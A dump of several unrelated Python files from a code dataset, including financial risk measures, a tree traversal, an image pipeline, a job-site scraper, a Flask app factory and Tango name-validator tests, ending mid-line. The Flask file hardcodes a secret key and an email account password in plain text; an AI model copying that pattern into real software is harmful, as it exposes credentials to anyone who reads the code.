__risk_measure_with_doc_string(\n 'EqDelta',\n 'Equity Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Equity)\nEqGamma = __risk_measure_with_doc_string(\n 'EqGamma',\n 'Equity Gamma',\n RiskMeasureType.Gamma,\n asset_class=AssetClass.Equity)\nEqVega = __risk_measure_with_doc_string('EqVega', 'Equity Vega', RiskMeasureType.Vega, asset_class=AssetClass.Equity)\nEqSpot = __risk_measure_with_doc_string(\n 'EqSpot',\n 'Equity Spot Level',\n RiskMeasureType.Spot, asset_class=AssetClass.Equity)\nEqAnnualImpliedVol = __risk_measure_with_doc_string(\n 'EqAnnualImpliedVol',\n 'Equity Annual Implied Volatility (%)',\n RiskMeasureType.Annual_Implied_Volatility,\n asset_class=AssetClass.Equity,\n unit=RiskMeasureUnit.Percent)\nCommodDelta = __risk_measure_with_doc_string(\n 'CommodDelta',\n 'Commodity Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Commod)\nCommodTheta = __risk_measure_with_doc_string(\n 'CommodTheta',\n 'Commodity Theta',\n RiskMeasureType.Theta,\n asset_class=AssetClass.Commod)\nCommodVega = __risk_measure_with_doc_string(\n 'CommodVega',\n 'Commodity Vega',\n RiskMeasureType.Vega,\n asset_class=AssetClass.Commod)\nFairVolStrike = __risk_measure_with_doc_string(\n 'FairVolStrike',\n 'Fair Volatility Strike Value of a Variance Swap',\n RiskMeasureType.FairVolStrike)\nFairVarStrike = __risk_measure_with_doc_string(\n 'FairVarStrike',\n 'Fair Variance Strike Value of a Variance Swap',\n RiskMeasureType.FairVarStrike)\nFXDelta = __risk_measure_with_doc_string('FXDelta', 'FX Delta', RiskMeasureType.Delta, asset_class=AssetClass.FX,\n parameter_type=\"FiniteDifference\")\nFXGamma = __risk_measure_with_doc_string('FXGamma', 'FX Gamma', RiskMeasureType.Gamma, asset_class=AssetClass.FX)\nFXVega = __risk_measure_with_doc_string('FXVega', 'FX Vega', RiskMeasureType.Vega, asset_class=AssetClass.FX,\n parameter_type=\"FiniteDifference\")\nFXSpot = __risk_measure_with_doc_string('FXSpot', 'FX Spot Rate', RiskMeasureType.Spot, asset_class=AssetClass.FX)\nFXAnnualATMImpliedVol = __risk_measure_with_doc_string(\n 'FXAnnualATMImpliedVol',\n 'FX Annual ATM Implied Volatility',\n RiskMeasureType.Annual_ATM_Implied_Volatility,\n asset_class=AssetClass.FX,\n unit=RiskMeasureUnit.Percent)\nFXAnnualImpliedVol = __risk_measure_with_doc_string(\n 'FXAnnualImpliedVol',\n 'FX Annual Implied Volatility',\n RiskMeasureType.Annual_Implied_Volatility,\n asset_class=AssetClass.FX,\n unit=RiskMeasureUnit.Percent)\nIRBasis = __risk_measure_with_doc_string(\n 'IRBasis',\n 'Interest Rate Basis',\n RiskMeasureType.Basis,\n asset_class=AssetClass.Rates, parameter_type=\"FiniteDifference\")\nIRBasisParallel = IRBasis(aggregation_level=AggregationLevel.Asset, name='IRBasisParallel')\nInflationDelta = __risk_measure_with_doc_string(\n 'InflationDelta',\n 'Inflation Delta',\n RiskMeasureType.InflationDelta,\n asset_class=AssetClass.Rates, parameter_type='FiniteDifference')\nInflationDeltaParallel = InflationDelta(aggregation_level=AggregationLevel.Type, name='InflationDeltaParallel')\nInflationDeltaParallelLocalCcy = InflationDelta(aggregation_level=AggregationLevel.Type, currency='local',\n name='InflationDeltaParallelLocalCcy')\nIRDelta = __risk_measure_with_doc_string(\n 'IRDelta',\n 'Interest Rate Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Rates, parameter_type=\"FiniteDifference\")\nIRDeltaParallel = IRDelta(aggregation_level=AggregationLevel.Asset, name='IRDeltaParallel')\nIRDeltaLocalCcy = IRDelta(currency='local', name='IRDeltaLocalCcy')\nIRDeltaParallelLocalCcy = IRDelta(aggregation_level=AggregationLevel.Type, currency='local',\n name='IRDeltaParallelLocalCcy')\nIRDiscountDeltaParallel = __risk_measure_with_doc_string(\n 'IRDiscountDeltaParallel',\n 'Parallel Discount Delta',\n RiskMeasureType.ParallelDiscountDelta,\n asset_class=AssetClass.Rates)\nIRDiscountDeltaParallelLocalCcy = __risk_measure_with_doc_string(\n 'IRDiscountDeltaParallelLocalCcy',\n 'Parallel Discount Delta (Local Ccy)',\n RiskMeasureType.ParallelDiscountDeltaLocalCcy,\n asset_class=AssetClass.Rates)\nIRXccyDelta = __risk_measure_with_doc_string(\n 'IRXccyDelta',\n 'Cross-ccy Delta',\n RiskMeasureType.XccyDelta,\n asset_class=AssetClass.Rates, parameter_type='FiniteDifference')\nIRXccyDeltaParallel = IRXccyDelta(aggregation_level=AggregationLevel.Type, name='IRXccyDeltaParallel')\nIRXccyDeltaParallelLocalCurrency = IRXccyDelta(aggregation_level=AggregationLevel.Type, currency='local',\n name='IRXccyDeltaParallelLocalCurrency')\nIRGammaParallel = __risk_measure_with_doc_string(\n 'IRGammaParallel',\n 'Interest Rate Parallel Gamma',\n RiskMeasureType.ParallelGamma,\n asset_class=AssetClass.Rates)\nIRGammaParallelLocalCcy = __risk_measure_with_doc_string(\n 'IRGammaParallelLocalCcy',\n 'Interest Rate Parallel Gamma (Local Ccy)',\n RiskMeasureType.ParallelGammaLocalCcy,\n asset_class=AssetClass.Rates)\nIRVega = __risk_measure_with_doc_string(\n 'IRVega',\n 'Interest Rate Vega',\n RiskMeasureType.Vega,\n asset_class=AssetClass.Rates, parameter_type=\"FiniteDifference\")\nIRVegaParallel = IRVega(aggregation_level=AggregationLevel.Asset, name='IRVegaParallel')\nIRVegaLocalCcy = IRVega(currency='local', name='IRVegaLocalCcy')\nIRVegaParallelLocalCcy = IRVega(aggregation_level=AggregationLevel.Type, currency='local',\n name='IRVegaParallelLocalCcy')\nIRAnnualImpliedVol = __risk_measure_with_doc_string(\n 'IRAnnualImpliedVol',\n 'Interest Rate Annual Implied Volatility (%)',\n RiskMeasureType.Annual_Implied_Volatility,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nIRAnnualATMImpliedVol = __risk_measure_with_doc_string(\n 'IRAnnualATMImpliedVol',\n 'Interest Rate Annual Implied At-The-Money Volatility (%)',\n RiskMeasureType.Annual_ATMF_Implied_Volatility,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nIRDailyImpliedVol = __risk_measure_with_doc_string(\n 'IRDailyImpliedVol',\n 'Interest Rate Daily Implied Volatility (bps)',\n RiskMeasureType.Daily_Implied_Volatility,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.BPS)\nIRSpotRate = __risk_measure_with_doc_string(\n 'IRSpotRate',\n 'At-The-Money Spot Rate (%)',\n RiskMeasureType.Spot_Rate,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nIRFwdRate = __risk_measure_with_doc_string(\n 'IRFwdRate',\n 'Par Rate (%)',\n RiskMeasureType.Forward_Rate,\n asset_class=AssetClass.Rates,\n unit=RiskMeasureUnit.Percent)\nCDDelta = __risk_measure_with_doc_string(\n 'CDDelta',\n 'Credit Delta',\n RiskMeasureType.Delta,\n asset_class=AssetClass.Credit)\nCDVega = __risk_measure_with_doc_string(\n 'CDVega',\n 'Credit Vega',\n RiskMeasureType.Vega,\n asset_class=AssetClass.Credit)\nCDGamma = __risk_measure_with_doc_string(\n 'CDGamma',\n 'Credit Gamma',\n RiskMeasureType.Gamma,\n asset_class=AssetClass.Credit)\nCDTheta = __risk_measure_with_doc_string(\n 'CDTheta',\n 'Credit Theta',\n RiskMeasureType.Theta,\n asset_class=AssetClass.Credit)\nCDATMSpread = __risk_measure_with_doc_string(\n 'CDATMSpread',\n 'Credit ATM Spread',\n RiskMeasureType.ATM_Spread,\n asset_class=AssetClass.Credit)\nCRIFIRCurve = __risk_measure_with_doc_string(\n 'CRIFIRCurve',\n 'CRIF IR Curve',\n RiskMeasureType.CRIF_IRCurve)\nResolvedInstrumentValues = __risk_measure_with_doc_string(\n 'ResolvedInstrumentBaseValues',\n 'Resolved InstrumentBase Values',\n RiskMeasureType.Resolved_Instrument_Values\n)\nDescription = __risk_measure_with_doc_string(\n 'Description',\n 'Description',\n RiskMeasureType.Description\n)\nCashflows = __risk_measure_with_doc_string(\n 'Cashflows',\n 'Cashflows',\n RiskMeasureType.Cashflows\n)\nMarketDataAssets = __risk_measure_with_doc_string(\n 'MarketDataAssets',\n 'MarketDataAssets',\n RiskMeasureType.Market_Data_Assets\n)\nMarketData = __risk_measure_with_doc_string(\n 'Market Data',\n 'Market Data map of coordinates and values',\n RiskMeasureType.Market_Data\n)\nParSpread = __risk_measure_with_doc_string(\n 'ParSpread',\n 'Par Spread',\n RiskMeasureType.Spread,\n asset_class=AssetClass.Rates)\n","sub_path":"gs_quant/risk/measures.py","file_name":"measures.py","file_ext":"py","file_size_in_byte":16172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410385319","text":"class Solution:\n #2014-10-15\n #Binary Tree Preorder Traversal\n # @param root, a tree node\n # @return a list of integers\n def preorderTraversal(self, root):\n stack = []\n stack.append(root)\n x = []\n while(len(stack) > 0):\n t = stack.pop()\n if t != None:\n x.append(t.val)\n if t.right != None:\n stack.append(t.right)\n if t.left != None:\n stack.append(t.left) \n return x","sub_path":"LeetCode/Solved/oj144.py","file_name":"oj144.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390965697","text":"# AI HW2\n# class for containing data about each piece of the tower\n# Amanda Adkins, Sam Mailand\n# Stephen Long, Alec Thompson\n\n# class for each piece of a tower (for puzzle 3)\nclass TowerPiece:\n\tDOOR = 0\n\tWALL = 1\n\tLOOKOUT = 2\n\n\t# initialization for pieces\n\t# line string is the string read from the file that contains data about the piece\n\t# other parameters are for creating an object not from a file (for autogeneration fo sample files)\n\tdef __init__(self, lineString, pieceType=0, width=0, strength=0, cost=0):\n\t\t# if we're making the tower piece from the text file\n\t\tif (lineString != None):\n\t\t\t# parse the attributes\n\t\t\twords = lineString.split(\", \")\n\t\t\tif (len(words) != 4):\n\t\t\t\t# shouldn't happen\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t# get the piece type\n\t\t\t\tif (words[0] == \"Door\"):\n\t\t\t\t\tself.pieceType = TowerPiece.DOOR\n\t\t\t\telif (words[0] == \"Wall\"):\n\t\t\t\t\tself.pieceType = TowerPiece.WALL\n\t\t\t\telif (words[0] == \"Lookout\"):\n\t\t\t\t\tself.pieceType = TowerPiece.LOOKOUT\n\t\t\t\t# set the width\n\t\t\t\tself.width = int(words[1])\n\t\t\t\t# set the strength\n\t\t\t\tself.strength = int(words[2])\n\t\t\t\t# set the cost\n\t\t\t\tself.cost = int(words[3])\n\t\telse:\n\t\t\tself.pieceType = pieceType\n\t\t\tself.width = width\n\t\t\tself.strength = strength\n\t\t\tself.cost = cost\n\n\tdef getCost(self):\n\t\treturn self.cost\n\n\tdef getPieceType(self):\n\t\treturn self.pieceType\n\n\tdef getWidth(self):\n\t\treturn self.width\n\n\tdef getStrength(self):\n\t\treturn self.strength\n\n\t# get the string represetnation to print out to the user\n\tdef getStringRepresentation(self):\n\t\tstringRep = \"\"\n\t\tif (self.getPieceType() == TowerPiece.DOOR):\n\t\t\tstringRep += \"Door\"\n\t\telif (self.getPieceType() == TowerPiece.LOOKOUT):\n\t\t\tstringRep += \"Lookout\"\n\t\telif (self.getPieceType() == TowerPiece.WALL):\n\t\t\tstringRep += \"Wall\"\n\n\t\tstringRep += \", \"\n\t\tstringRep += \"Width: \"\n\t\tstringRep += str(self.width)\n\n\t\tstringRep += \", \"\n\t\tstringRep += \"Strength: \"\n\t\tstringRep += str(self.strength)\n\n\t\tstringRep += \", \"\n\t\tstringRep += \"Cost: \"\n\t\tstringRep += str(self.cost)\n\n\t\treturn stringRep\n\t\t\n\t# get the string representation to write to the file\n\tdef getString(self):\n\t\tstringRep = \"\"\n\t\tif (self.getPieceType() == TowerPiece.DOOR):\n\t\t\tstringRep += \"Door\"\n\t\telif (self.getPieceType() == TowerPiece.LOOKOUT):\n\t\t\tstringRep += \"Lookout\"\n\t\telif (self.getPieceType() == TowerPiece.WALL):\n\t\t\tstringRep += \"Wall\"\n\t\tstringRep += \", \"\n\t\tstringRep += str(self.width)\n\t\tstringRep += \", \"\n\t\tstringRep += str(self.strength)\n\t\tstringRep += \", \"\n\t\tstringRep += str(self.cost)\n\t\tstringRep += \"\\n\"\n\t\treturn stringRep","sub_path":"2assignment/TowerPiece.py","file_name":"TowerPiece.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638305556","text":"import numpy as np\nfrom KhawagaNeuralNetwork.layer import Layer\nfrom KhawagaNeuralNetwork.optimizer import optimizer\n\nclass SoftmaxLayer(Layer):\n def __init__(self,size,activation,lr=0.001,optimizer_name='GD',beta=1,raw=1,epsilon=1):\n super(). __init__(size,activation,lr=0.001,optimizer_name='GD',beta=1,raw=1,epsilon=1)\n\n def backward(self,y):\n error = 2 * (self.A - y) / self.A.shape[0] * self.activation(self.Z, derivative=True)\n change_w = np.outer(error, self.x)\n change_b = np.sum(error,keepdims=True)\n \n w=optimizer(self.W,self.lr,change_w)\n b=optimizer(self.b,self.lr,change_b)\n\n \n if self.optimizer_name== \"momentum_based\":\n self.W=w.momentum_based(self.beta)\n self.b=b.momentum_based(self.beta)\n elif self.optimizer_name==\"adagrad\":\n self.W=w.adagrad()\n self.b=b.adagrad()\n elif self.optimizer_name==\"RMSProp\":\n self.W=w.RMSProp(self.raw)\n self.b=b.RMSProp(self.raw)\n elif self.optimizer_name==\"adaDelta\":\n self.W=w.adaDelta(self.raw,self.epsilon)\n self.b=b.adaDelta(self.raw,self.epsilon)\n else: \n self.W=w.GD()\n self.b=b.GD()\n\n\n return np.dot(self.W.T, error)\n","sub_path":"KhawagaNeuralNetwork/softmax_layer.py","file_name":"softmax_layer.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407305921","text":"\"\"\" This module defines the image processing pipeline as described in README.md \"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom skimage.filters import threshold_otsu\nfrom skimage.io import imread\nfrom skimage.morphology import binary_closing, remove_small_objects\nfrom skimage.measure import label, regionprops\nfrom skimage.color import label2rgb\nfrom skimage.util import img_as_ubyte\n\ndef processing_pipe(image_path):\n \"\"\" This is the actual image processing function.\n It encapsulates every processing step from reading the file,\n converting it to a numpy array, cropping, performing morphological\n operations computing all region's properties (get_regions_props())\n and returning the resulting properties as well as initial the\n initial image, the intermediate and final images. \"\"\"\n\n # reading data, converting to greyscale, converting to numpy array\n img = imread(image_path)\n greyscale_array = np.array(img)\n \n # cropping out the interesting part & extracting green channel (rgb -> grey)\n greyscale_cropped_image = greyscale_array[:, :, 1]\n\n # segmenting using otsu's method\n global_threshold = threshold_otsu(greyscale_cropped_image)\n\n # filling small holes\n greyscale_closed = binary_closing(np.invert(greyscale_cropped_image > global_threshold))\n\n # removing small objects outside of leaf\n greyscale_closed_rem = remove_small_objects(greyscale_closed, min_size=128, connectivity=2)\n\n # label the binary image and combine with rgb representation\n labelled_image = label(greyscale_closed_rem)\n image_label_overlay = label2rgb(labelled_image, image=greyscale_cropped_image)\n\n # compute region's properties\n regions_properties = get_regions_props(labelled_image) \n\n # returning images after converting segmented image back to 8 bit format & labelling it\n image_data = { \"original_img\": img,\n \"greyscale_img\": greyscale_cropped_image,\n \"segmented_ubyte_img_bw\": img_as_ubyte(greyscale_closed_rem),\n \"labelled_image\": labelled_image,\n \"labelled_ubyte_img_rgb\": img_as_ubyte(image_label_overlay),\n \"regions_properties\": regions_properties }\n\n return image_data\n\n\ndef get_regions_props(img):\n \"\"\" The function computes the region's properties of a labelled image.\n It returns a pandas DataFrame with the properties eccentricity,\n extent, solidity and roundness (manually computed).\n Other properties from the regionprops function or custom ones\n could be included here as well. \"\"\"\n\n # getting region's properties and filtering by extent\n regions_properties = regionprops(img, cache=True)\n\n # creating dataframe\n dataframe = pd.DataFrame(columns=[\"eccentricity\", \"extent\", \"solidity\", \"roundness\"])\n\n # getting the props for the only region\n for props in regions_properties:\n # manually calculating roundness\n roundness = 4 * np.pi * props.area / props.perimeter**2\n\n # appending data to dataframe\n dataframe.loc[len(dataframe)+1] = [props.eccentricity, props.extent, props.solidity, roundness]\n\n return dataframe\n","sub_path":"src/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12324137","text":"from flask import Flask\nfrom os.path import dirname, abspath, join\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_bcrypt import Bcrypt\nfrom flask_mail import Mail\n\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\nbcrypt = Bcrypt()\nmail=Mail()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'dfdQbTOExternjy5xmCNaA'\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['MAIL_SERVER'] = 'smtp.googlemail.com'\n app.config['MAIL_PORT'] = 587\n app.config['MAIL_USE_TLS'] = True\n app.config['MAIL_USERNAME'] = 'gradlab63@gmail.com'\n app.config['MAIL_PASSWORD'] = 'RandomPassword123!'\n mail.init_app(app)\n CWD = dirname(abspath(__file__))\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + join(CWD, 'gradlab.sqlite')\n db.init_app(app)\n login_manager.init_app(app)\n bcrypt.init_app(app)\n login_manager.login_view = 'main.login'\n from app.models import Account, Test, Question\n from populate_db import populate_db\n with app.app_context():\n db.create_all()\n populate_db()\n\n # Register Blueprints\n from app.main.routes import bp_main\n app.register_blueprint(bp_main)\n from app.errors.handlers import errors\n app.register_blueprint(errors)\n return app\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313710383","text":"# Alex Ruan\n#Ascend-Descend\n#14 September 2018\n\nimport sys\nimport math as m\nimport random as r\n\nx = float(sys.argv[1])\ny = float(sys.argv[2])\nz = float(sys.argv[3])\n\nif x < y < z or x > y > z:\n print(\"True\")\n print(x, y, z)\n\nelse:\n print(\"False\")\n print(x, y, z)\n\ninput()\n","sub_path":"ascend-descend.py","file_name":"ascend-descend.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46076544","text":"# -*- coding: utf-8 -*-\nimport os, sys\nimport datetime\nimport json\nfrom bson import json_util\nfrom pyquery import PyQuery as pq\nfrom bs4 import BeautifulSoup\nimport lxml.html\nimport time\n\nimport lagou_job_parser\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../../util'))\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../support'))\nimport loghelper\nimport util, download, name_helper,url_helper\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../util'))\nimport parser_db_util\n\n#logger\nloghelper.init_logger(\"lagou_company_parser\", stream=True)\nlogger = loghelper.get_logger(\"lagou_company_parser\")\n\nSOURCE = 13050 #Lgou\nTYPE = 36001 #公司信息\naa =0\ncnt = 0\ndownload_crawler = download.DownloadCrawler(use_proxy=True)\n\ndef process():\n global aa,cnt\n logger.info(\"lagou_company_parser begin...\")\n while True:\n\n items = parser_db_util.find_all_limit(SOURCE, TYPE, aa,1000)\n #items = [parser_db_util.find_process_one(SOURCE, TYPE, 128040)]\n aa += 1000\n for item in items:\n\n r = parse_company(item)\n\n if r[\"status\"] == \"Sub_company\":\n #parser_db_util.update_active(SOURCE, item[\"key\"], 'N')\n #parser_db_util.update_processed(item[\"_id\"])\n logger.info(\"Fullname %s, %s\", r[\"name\"], item[\"url\"])\n cnt += 1\n continue\n\n #exit()\n\n if len(items) == 0:\n break\n\n logger.info(\"total : %s\", cnt)\n #break\n\n logger.info(\"lagou_company_parser end.\")\n\n\ndef parse_company(item):\n if item is None:\n return None\n\n #logger.info(\"*** base ***\")\n company_key = item[\"key\"]\n html = item[\"content\"]\n #logger.info(html)\n d = pq(html)\n\n logo = d('.top_info_wrap > img').attr('src')\n if logo.startswith(\"http\") or logo.startswith(\"https\"):\n pass\n else:\n logo = \"http:\"+logo\n\n name = d('.company_main > h1 > a').text()\n fullName = d('.company_main > h1 > a').attr('title')\n fullName = name_helper.company_name_normalize(fullName)\n if name is None or fullName is None:\n return {\n \"status\": \"No_Name\",\n }\n if len(name) > len(fullName):\n name = fullName\n\n if fullName.find(\"分公司\") >= 0:\n return {\n \"status\": \"Sub_company\",\n \"name\": fullName\n }\n\n return {\n \"status\": \"good\"\n }\n\n\n\nif __name__ == \"__main__\":\n while True:\n process()\n time.sleep(60*30)","sub_path":"data/spider2/parser/recruit/lagou/lagou_company_full_name_check.py","file_name":"lagou_company_full_name_check.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186568231","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/taurus/core/tango/test/test_tangovalidator.py\n# Compiled at: 2019-08-19 15:09:29\n\"\"\"Test for taurus.core.tango.test.test_tangovalidator...\"\"\"\n__docformat__ = 'restructuredtext'\nimport unittest\nfrom taurus.core.test import valid, invalid, names, AbstractNameValidatorTestCase\nfrom taurus.core.tango.tangovalidator import TangoAuthorityNameValidator, TangoDeviceNameValidator, TangoAttributeNameValidator\nimport PyTango, socket\n__PY_TANGO_HOST = PyTango.ApiUtil.get_env_var('TANGO_HOST')\nhost, port = __PY_TANGO_HOST.split(':')\n__TANGO_HOST = ('{0}:{1}').format(socket.getfqdn(host), port)\n\n@valid(name='tango://foo:10000')\n@invalid(name='tango:foo')\n@invalid(name='tango:foo:10000')\n@invalid(name='tango://foo:10000/')\n@invalid(name='tango://foo:10000/?')\n@invalid(name='tango://foo:bar')\n@invalid(name='tango://foo:10000/foo')\n@names(name='tango://foo:123', out=('tango://foo:123', '//foo:123', 'foo:123'))\n@names(name='//foo:123', out=('tango://foo:123', '//foo:123', 'foo:123'))\nclass TangoAuthValidatorTestCase(AbstractNameValidatorTestCase, unittest.TestCase):\n validator = TangoAuthorityNameValidator\n\n\n@valid(name='tango:foo', groups={'devname': 'foo', '_devalias': 'foo', \n '_devslashname': None})\n@valid(name='tango:a/b/c', groups={'devname': 'a/b/c', '_devalias': None, \n '_devslashname': 'a/b/c'})\n@valid(name='tango://foo:123/a/b/c', groups={'devname': 'a/b/c', '_devalias': None, \n '_devslashname': 'a/b/c'})\n@valid(name='tango:a/b/ c', groups={'devname': 'a/b/ c'})\n@invalid(name='tango:/a/b/c?')\n@valid(name='tango://a/b/c', strict=False)\n@valid(name='tango:alias')\n@valid(name='tango://alias', strict=False)\n@valid(name='tango://a/b/c', strict=False)\n@invalid(name='tango:foo:1234/alias', strict=False)\n@invalid(name='tango:foo:1234/a/b/c', strict=False)\n@valid(name='foo:1234/alias', strict=False)\n@valid(name='foo:1234/a/b/c', strict=False)\n@invalid(name='tango://a/b/c', strict=True)\n@invalid(name='tango://devalias')\n@names(name='tango://foo:123/a/b/c', out=('tango://foo:123/a/b/c', '//foo:123/a/b/c',\n 'a/b/c'))\n@names(name='tango:sys/tg_test/1', out=(\n 'tango://%s/sys/tg_test/1' % __TANGO_HOST,\n 'sys/tg_test/1', 'sys/tg_test/1'))\n@names(name='tango:alias', out=(None, None, 'alias'))\nclass TangoDevValidatorTestCase(AbstractNameValidatorTestCase, unittest.TestCase):\n validator = TangoDeviceNameValidator\n\n\n@valid(name='foo:10000/a/b/c/d', strict=False)\n@valid(name='mot/position', strict=False)\n@valid(name='tango:a/b/c/d', groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', \n '_shortattrname': 'd'})\n@valid(name='tango:alias/attr', groups={'devname': 'alias', '_devalias': 'alias', \n 'attrname': 'alias/attr', \n '_shortattrname': 'attr'})\n@valid(name='tango://a/b/c/d', strict=False)\n@valid(name='tango://alias/attr', strict=False)\n@invalid(name='tango://a/b/c/d')\n@invalid(name='tango://a/b/c/')\n@invalid(name='tango://alias/attr')\n@invalid(name='tango://a/b/c/d?')\n@invalid(name='tango:a/b/c')\n@invalid(name='tango:sys/tg_test/1')\n@names(name='tango://foo:123/a/b/c/d', out=('tango://foo:123/a/b/c/d', '//foo:123/a/b/c/d',\n 'd'))\n@names(name='tango:sys/tg_test/1/float_scalar', out=(\n 'tango://%s/sys/tg_test/1/float_scalar' % __TANGO_HOST,\n 'sys/tg_test/1/float_scalar', 'float_scalar'))\n@valid(name='tango:a/b/c/d#', groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', '_shortattrname': 'd', 'cfgkey': ''})\n@valid(name='tango:a/b/c/d#label', groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', '_shortattrname': 'd', 'cfgkey': 'label'})\n@valid(name='tango:alias/attr#')\n@valid(name='tango:alias/attr#label')\n@valid(name='tango://a/b/c/d?configuration', strict=False)\n@valid(name='tango://a/b/c/d?configuration=label', strict=False, groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', \n '_shortattrname': 'd', \n 'cfgkey': 'label', \n 'fragment': 'label'})\n@invalid(name='tango://a/b/c/d#')\n@invalid(name='tango://a/b/c/d?foo', strict=False)\n@invalid(name='tango://a/b/c/d?foo=label', strict=False)\n@valid(name='tango:a/b/c/d#?foo=label')\n@valid(name='tango:a/b/c/d#label?foo=bar')\n@names(name='tango://foo:123/a/b/c/d#', out=('tango://foo:123/a/b/c/d', '//foo:123/a/b/c/d',\n 'd', ''))\n@names(name='tango://foo:123/a/b/c/d#label', out=('tango://foo:123/a/b/c/d', '//foo:123/a/b/c/d',\n 'd', 'label'))\n@names(name='tango:sys/tg_test/1/float_scalar#', out=(\n 'tango://%s/sys/tg_test/1/float_scalar' % __TANGO_HOST,\n 'sys/tg_test/1/float_scalar', 'float_scalar', ''))\n@names(name='tango://foo:123/a/b/c/d?configuration=label', out=('tango://foo:123/a/b/c/d',\n '//foo:123/a/b/c/d',\n 'd', 'label'))\nclass TangoAttrValidatorTestCase(AbstractNameValidatorTestCase, unittest.TestCase):\n validator = TangoAttributeNameValidator\n\n\nif __name__ == '__main__':\n pass","sub_path":"pycfiles/taurus-4.6.1-py2.7/test_tangovalidator.py","file_name":"test_tangovalidator.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643518112","text":"#! /usr/bin/python3\n\n###! Python Class Inheritance\n\n##? Creating parent class (normal class)\nclass Person:\n def __init__(self, fname, lname):\n self.firstname = fname\n self.lastname = lname\n\n def printname(self):\n print(self.firstname, self.lastname)\n\n# Use the Person class to create an object, and then execute the printname method:\nx = Person(\"John\", \"Doe\")\nx.printname()\n\n\n\n##? Creating a child class\n# * child class inherits the functionality from another class\n# * we declare the parent class as a parameter when creating the child class\nclass Student(Person):\n pass\n\n# Now, the student class can execute the printname method: \nz = Student(\"Mike\", \"Olsen\")\nz.printname()\n\n\n\n##? Adding the __init__() function to child class\nclass Tapster(Person):\n def __init__(self, fname, lname): # * The child's __init__() function OVERRIDES the inheritance if parent's __init__() function\n # To keep the inheritance of the parent's __init__() function, add a call to the parent's __init__() function:\n Person.__init__(self, fname, lname)\n\nc = Tapster(\"Duke\", \"Nukem\")\nc.printname()\n\n\n\n\n##? Using the super() function and adding properties\n# * It makes the child class inherit all the methods and properties from its parent\n# * By using super() function you do not have to use the name of parent element\nclass Builder(Person):\n def __init__(self, fname, lname, year):\n super().__init__(fname, lname)\n self.yearOfBorn = year\n\nv = Builder(\"Bob\", \"Builder\", \"1963\")\nprint(v.yearOfBorn)\n\n\n\n##? Adding methods\nclass Woman(Person):\n def __init__(self, fname, lname, year):\n super().__init__(fname, lname)\n self.yearOfBorn = year\n\n def welcome(self):\n print(\"Welcome\", self.firstname, self.lastname, \"you are woman born in\", self.yearOfBorn)\n\nb = Woman(\"Jadwiga\", \"Agiwdaj\", \"1915\")\nprint(b.yearOfBorn)\nb.welcome()\n\n","sub_path":"basics/class_inheritance_parent_and_child_class_super().py","file_name":"class_inheritance_parent_and_child_class_super().py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119178412","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\ntijd = []\nauto1 = []\nauto2 = []\nauto3 = []\nwith open(\"verkeerssimulatie-rechteweg-snelheden.csv\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\";\")\n for regel in reader:\n tijd.append(float(regel[0]))\n auto1.append(float(regel[1]))\n auto2.append(float(regel[2])) \n auto3.append(float(regel[3]))\ntijd.pop(0)\nx= tijd\np1 = auto1.pop(0)\np2 = auto2.pop(0)\np3 = auto3.pop(0)\nprint(p1,p2,p3)\npositie1 = [np.trapz(auto1[0:i+2],tijd[0:i+2]) + p1 for i in range(len(tijd)-1)]\npositie2 = [np.trapz(auto2[0:i+2],tijd[0:i+2]) + p2 for i in range(len(tijd)-1)]\npositie3 = 